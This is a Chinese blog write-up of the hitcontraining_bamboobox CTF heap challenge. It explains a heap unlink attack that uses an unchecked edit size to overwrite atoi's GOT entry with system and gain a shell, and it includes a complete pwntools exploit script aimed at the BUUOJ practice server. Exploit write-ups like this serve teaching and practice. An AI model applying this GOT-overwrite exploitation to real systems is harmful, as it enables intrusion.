hitcontraining_bamboobox的wp

最新推荐文章于 2021-05-13 22:14:18 发布
最新推荐文章于 2021-05-13 22:14:18 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/114904536
版权

是个堆题
add函数
在这里插入图片描述
change函数 没有判断大小可以进行unlink操作
在这里插入图片描述
伪造一个空闲 chunk。
通过 unlink 把 chunk 移到存储 chunk 指针的内存处。
覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。
覆盖 atoi 的 got 表为 system 函数地址。
给出参数 ‘sh’,调用 atoi 函数拿 shell。

add(0x40,b'a' * 8)
add(0x80,b'b' * 8)
add(0x80,b'c' * 8)
 
ptr = 0x6020c8
 
fake_chunk = p64(0)
fake_chunk += p64(0x41)
fake_chunk += p64(ptr-0x18)
fake_chunk += p64(ptr-0x10)
fake_chunk += 'c'*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
edit(0,0x80,fake_chunk)

首先在 chunk 0 构造一个 fake chunk ,并把指针分别置为 ptr-0x18 和 ptr-0x10 ,同时把 chunk 1 的 prev_size 给上 fak chunk 的大小,把 size 的 inuse 位置 0 ,这样在 free chunk 1 的时候,程序会误以为 fake chunk 为空闲的,从而触发 unlink 操作,将 ptr 指针置为 ptr - 0x18。

emove(1)
payload = p64(0) * 2
payload += p64(0x40) + p64(0x602068)
edit(0,0x80,payload)

free 掉chunk 1 后,改写 chunk 0 的内容为 atoi 的 got 表地址。

show()
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
print "libc:",hex(libcbase) 
system_addr = libcbase + libc.symbols['system']
print 'system:',hex(system_addr)

泄露 atoi 函数的地址,并计算 system 函数的地址。

edit(0,0x8,p64(system_addr))
r.recvuntil(":")
r.sendline("sh")

exp

from pwn_debug import *
 
#context.log_level = 'debug'
pdbg = pwn_debug('bamboobox')
pdbg.local()
pdbg.remote('node3.buuoj.cn',26510)
#libc = ELF('./x64_libc.so.6')
r = pdbg.run('remote')
libc = pdbg.libc
 
def add(length,name):
	r.recvuntil(":")
	r.sendline('2')
	r.recvuntil(':')
	r.sendline(str(length))
	r.recvuntil(":")
	r.sendline(name)
 
def edit(idx,length,name):
	r.recvuntil(':')
	r.sendline('3')
	r.recvuntil(":")
	r.sendline(str(idx))
	r.recvuntil(":")
	r.sendline(str(length))
	r.recvuntil(':')
	r.sendline(name)
 
def remove(idx):
	r.recvuntil(":")
	r.sendline("4")
	r.recvuntil(":")
	r.sendline(str(idx))
 
def show():
	r.recvuntil(":")
	r.sendline("1")
 
 
add(0x40,'a' * 8)
add(0x80,'b' * 8)
add(0x80,'c' * 8)
 
ptr = 0x6020c8
 
fake_chunk = p64(0)
fake_chunk += p64(0x41)
fake_chunk += p64(ptr-0x18)
fake_chunk += p64(ptr-0x10)
fake_chunk += 'c'*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
edit(0,0x80,fake_chunk)
 
#gdb.attach(r)
 
remove(1)
payload = p64(0) * 2
payload += p64(0x40) + p64(0x602068)
edit(0,0x80,payload)
 
#gdb.attach(r)
 
show()
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
print "libc:",hex(libcbase) 
system_addr = libcbase + libc.symbols['system']
print 'system:',hex(system_addr)
 
edit(0,0x8,p64(system_addr))
#gdb.attach(r)
 
r.recvuntil(":")
r.sendline("sh")
r.interactive()

灵感

w0nderMaker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HITCON-trainning&寒假做题记录
Peanuts
01-28 668
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
example_wp_log_peyton_manning.csv
03-17
Prophet的自带数据集。Facebook开源。 在官网可以下载到。https://github.com/facebook/prophet/blob/master/examples/example_wp_log_peyton_manning.csv
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 735
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
wp7--.rar_WP7_wp889.com::_wp889com_wp932_位置服务
09-23
WP7位置服务应用开发详解》 在移动设备领域,Windows Phone 7(简称WP7)是由微软公司推出的一款操作系统,它为开发者提供了一个强大的平台来构建创新的应用程序。其中,位置服务是WP7应用程序中的一项重要功能,...
WP321_Integrated_S7_1500_20170704_西门子WP321称重传感器使用教程_
09-30
西门子WP321称重传感器是一款专为自动化系统集成设计的高精度重量测量解决方案。这款传感器主要用于工业生产过程中的重量控制、批量处理、配料等应用,与S7-1500系列PLC(可编程逻辑控制器)无缝集成,提供高效、...
WP7_Barcode_Library.DLL-V1.3-Beta-Release.zip_ZXing _ZXing wp7_b
09-14
WP7 Barcode Library V1.3 Beta Release:ZXing Silverlight移植详解》 在移动开发领域,条形码和二维码的处理是不可或缺的功能之一。针对Windows Phone 7平台,ZXing(Zebra Crossing)库被移植到了Silverlight...
wp-all-import-pro.zip_WordPress_import_wp all import_wp all impo
09-21
《WordPress导入插件:wp-all-import-pro深度解析》 在WordPress的世界里,数据导入与导出是一项不可或缺的任务,尤其对于大型网站或者需要频繁更新内容的用户来说,一款高效的导入工具至关重要。今天我们要深入...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink)
mcmuyanga的博客
03-02 1295
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
【unlink】hitcontraining_bamboobox
huzai9527的博客
05-13 182
【unlink】hitcontraining_bamboobox 1. ida分析 有存放全局指针的数组,存放格式为itemlist[0]为size,itemlist[1]为指向item的指针 change时没有检测输入长度,存在堆溢出 2.思路 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位 free chunk1,unlink后itemlist[1] ->itemlist[-2] 再次编辑chunk0,即编辑item
HITCON-Training-master lab5 wp
zszcr的博客
04-07 374
程序防护机制:开启了NX堆栈不可执行查看了下ida反编译的代码可以发现主函数十分简单,但是程序里却又十分多的函数,说明这是静态链接编译的程序要求输入一局话,可以发现在read函数处有明显的栈溢出漏洞,buf大小是20 ,但是read函数读取100个字节的数据我一开始是想直接用ROPgadget生成ropchain的,但是尝试过发现,它可以溢出的空间不足以放下ROPgadget生成的ropchain...
HITCON-Training-master lab2 wp
zszcr的博客
04-03 681
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 371
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 429
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
HITCON training lab 11——bamboobox
04-23 573
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
EEPROM_WP_Pin
最新发布
07-27
EEPROM_WP_Pin是一个常见的术语,它通常用于描述电子设备中的一个引脚或接口。EEPROM代表可擦写可编程只读存储器(Electrically Erasable Programmable Read-Only Memory),WP代表写保护(Write Protect)。因此,EEPROM_WP_Pin是指用于控制EEPROM写保护功能的引脚。当该引脚处于写保护状态时,将禁止对EEPROM进行写入操作,以保护存储的数据不被修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值